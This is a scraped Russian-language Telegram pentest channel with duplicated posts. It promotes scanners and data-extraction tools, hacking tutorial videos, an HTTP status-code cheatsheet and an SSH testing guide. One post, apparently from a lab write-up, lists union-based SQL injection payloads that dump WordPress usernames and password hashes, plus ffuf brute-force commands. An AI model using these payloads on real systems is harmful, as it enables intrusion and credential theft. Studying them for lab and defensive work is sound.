Sitadel — сканер безопасности веб-приложений написанный на Python.
Полезный и простой в использовании инструмент сталкера.
Возможности:
🌵 Собирает информацию о используемых фреймворках, cms, os, языках, серверах и др.вещи на сайте
🌵 Брутфорс
🌵 Поддерживает разные инъекции:
🌵 HTML Injection
🌵 SQL Injection
🌵 LDAP Injection
🌵 XPath Injection
🌵 Cross Site Scripting (XSS)
🌵 Remote File Inclusion (RFI)
🌵 PHP Code Injection
🌵 Полный список возможностей на GitHub
Установка:
#python #soft #redteam #cybersec #pentest
Полезный и простой в использовании инструмент сталкера.
Возможности:
🌵 Собирает информацию о используемых фреймворках, cms, os, языках, серверах и др.вещи на сайте
🌵 Брутфорс
🌵 Поддерживает разные инъекции:
🌵 HTML Injection
🌵 SQL Injection
🌵 LDAP Injection
🌵 XPath Injection
🌵 Cross Site Scripting (XSS)
🌵 Remote File Inclusion (RFI)
🌵 PHP Code Injection
🌵 Полный список возможностей на GitHub
Установка:
$ git clone https://github.com/shenril/Sitadel.git⚙️ GitHub/Инструкция
$ cd Sitadel
$ pip3 install .
$ python sitadel.py --help
#python #soft #redteam #cybersec #pentest
Размещая в интернете (раз)личную информацию, многие даже не задумываются о рисках, которые могут таить в себе выложенные в отрытый доступ сведения. Рассказываем, как поменять настройки самых популярных сервисов, чтобы защитить персональные данные при работе в глобальной сети.
🌵 VK
🌵 OK
🌵 Youtube
🌵 Удаление информации с сайтов
🌵 Удаление информации через правоохранительные органы
#doc #cybersec
Please open Telegram to view this post
VIEW IN TELEGRAM
☠️ Как стать хакером?
⚡️ Большая практика по хакингу и пентесту для новичков
🔥 Ломаем сайт, раскучиваем LFI уязвимость, RCE и отравление логов на сервере
🌵 PHP и BASH Reverse shell
🕳 Что такое PHP wrapper и как с их помощью проникать на сайт
Если интересна тема пентеста и хакинга на практике, поддержите видео лайком и комментарием на YouTube. Спасибо за поддержку! 💪
https://youtu.be/HRUf_OHDuc8
#youtube #pentest #redteam
⚡️ Большая практика по хакингу и пентесту для новичков
🔥 Ломаем сайт, раскучиваем LFI уязвимость, RCE и отравление логов на сервере
🌵 PHP и BASH Reverse shell
🕳 Что такое PHP wrapper и как с их помощью проникать на сайт
Если интересна тема пентеста и хакинга на практике, поддержите видео лайком и комментарием на YouTube. Спасибо за поддержку! 💪
https://youtu.be/HRUf_OHDuc8
#youtube #pentest #redteam
Forwarded from [PYTHON:TODAY]
Посмотрел первую серию, лично мне зашло. Порадовало EternalBlue 😀 Ну и новый соперник удивил, надеюсь сценаристам хватит сил на весь сезон.
#cybersec
Please open Telegram to view this post
VIEW IN TELEGRAM
http-status-codes.png
780.4 KB
🕸 Коды ответа HTTP
Код ответа (состояния) HTTP показывает, был ли успешно выполнен определённый HTTP запрос. Коды сгруппированы в 5 классов:
1. Информационные 100 - 199
2. Успешные 200 - 299
3. Перенаправления 300 - 399
4. Клиентские ошибки 400 - 499
5. Серверные ошибки 500 - 599
#cheatsheet #network
Код ответа (состояния) HTTP показывает, был ли успешно выполнен определённый HTTP запрос. Коды сгруппированы в 5 классов:
1. Информационные 100 - 199
2. Успешные 200 - 299
3. Перенаправления 300 - 399
4. Клиентские ошибки 400 - 499
5. Серверные ошибки 500 - 599
#cheatsheet #network
This media is not supported in your browser
VIEW IN TELEGRAM
DataSurgeon v1.1.0 — утилита для извлечения полезной информации из текстовых файлов и страниц сайтов.
🌵 emails
🌵 phone numbers
🌵 API keys
🌵 URLs
🌵 MAC addresses
🌵 Hashes
🌵 Bitcoin wallets и д.р
⚙️ GitHub/Инструкция
#pentest #redteam #github #soft
🌵 emails
🌵 phone numbers
🌵 API keys
🌵 URLs
🌵 MAC addresses
🌵 Hashes
🌵 Bitcoin wallets и д.р
⚙️ GitHub/Инструкция
#pentest #redteam #github #soft
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from GitHub программиста
WhatWeb Next generation web scanner — Жирнющий сканер, комбайн
Из интересного: Больше 1800 плагинов и столько же разработчиков 🔥
⚙️ GitHub/Инструкция
#ruby #redteam #pentest
Из интересного: Больше 1800 плагинов и столько же разработчиков 🔥
⚙️ GitHub/Инструкция
#ruby #redteam #pentest
☠️ Как стать хакером?
⚡️ Большая пошаговая практика по хакингу и пентесту для новичков
🔥 Ломаем сайт на Wordpress, раскучиваем SQL инъекцию
🌵 Энумерация
🌵 SQL инъекции
🌵 Взлом хэшей паролей
🌵 Поиск субдоменов и директорий
🌵 Reverse shell
🌵 Повышение привилегий
Если интересна тема пентеста и хакинга на практике, поддержите видео лайком и комментарием на YouTube. Спасибо за поддержку! 💪
https://youtu.be/chC6DWwOiKc
#youtube #pentest #redteam
⚡️ Большая пошаговая практика по хакингу и пентесту для новичков
🔥 Ломаем сайт на Wordpress, раскучиваем SQL инъекцию
🌵 Энумерация
🌵 SQL инъекции
🌵 Взлом хэшей паролей
🌵 Поиск субдоменов и директорий
🌵 Reverse shell
🌵 Повышение привилегий
Если интересна тема пентеста и хакинга на практике, поддержите видео лайком и комментарием на YouTube. Спасибо за поддержку! 💪
https://youtu.be/chC6DWwOiKc
#youtube #pentest #redteam
NetStalkers
☠️ Как стать хакером? ⚡️ Большая пошаговая практика по хакингу и пентесту для новичков 🔥 Ломаем сайт на Wordpress, раскучиваем SQL инъекцию 🌵 Энумерация 🌵 SQL инъекции 🌵 Взлом хэшей паролей 🌵 Поиск субдоменов и директорий 🌵 Reverse shell 🌵 Повышение привилегий…
SQL injection:
'union select null, null-- -
'union select null, null, database()-- -
'union select null,null, table_schema from information_schema.tables-- -
'union select null,null,table_name from information_schema.tables where table_schema='wordpress'-- -
'union select null,null,group_concat(column_name) from information_schema.columns where table_name='wp_users'-- -
'union select null,null,group_concat(user_login,user_pass) from wordpress.wp_users-- -
Перебор субдоменов:
ffuf -u "http://wekor.thm" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.wekor.thm" -fs 23
Перебор директорий:
ffuf -u "http://site.wekor.thm/FUZZ" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Please open Telegram to view this post
VIEW IN TELEGRAM
SSH penetration testing.pdf
2.7 MB
Тестирование на проникновение через SSH от HackingAtricles, 2023 г.
Протокол SSH, также известный как Secure Shell, представляет собой метод безопасного и надежного удаленного входа с одного компьютера на другой. Он предлагает несколько вариантов надежной аутентификации, поскольку он защищает соединения и коммуникации, безопасность и целостность с помощью надежного шифрования. Это безопасная альтернатива незащищенным протоколам входа в систему (таким как telnet, rlogin) и небезопасным методам передачи файлов (таким как FTP).
#ssh #doc #redteam
Протокол SSH, также известный как Secure Shell, представляет собой метод безопасного и надежного удаленного входа с одного компьютера на другой. Он предлагает несколько вариантов надежной аутентификации, поскольку он защищает соединения и коммуникации, безопасность и целостность с помощью надежного шифрования. Это безопасная альтернатива незащищенным протоколам входа в систему (таким как telnet, rlogin) и небезопасным методам передачи файлов (таким как FTP).
#ssh #doc #redteam
💰 Как зарабатывать удаленно с нуля
💻 7 способов заработка в интернете
https://youtu.be/VjYgW_u1wvU
#youtube
https://youtu.be/VjYgW_u1wvU
#youtube
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM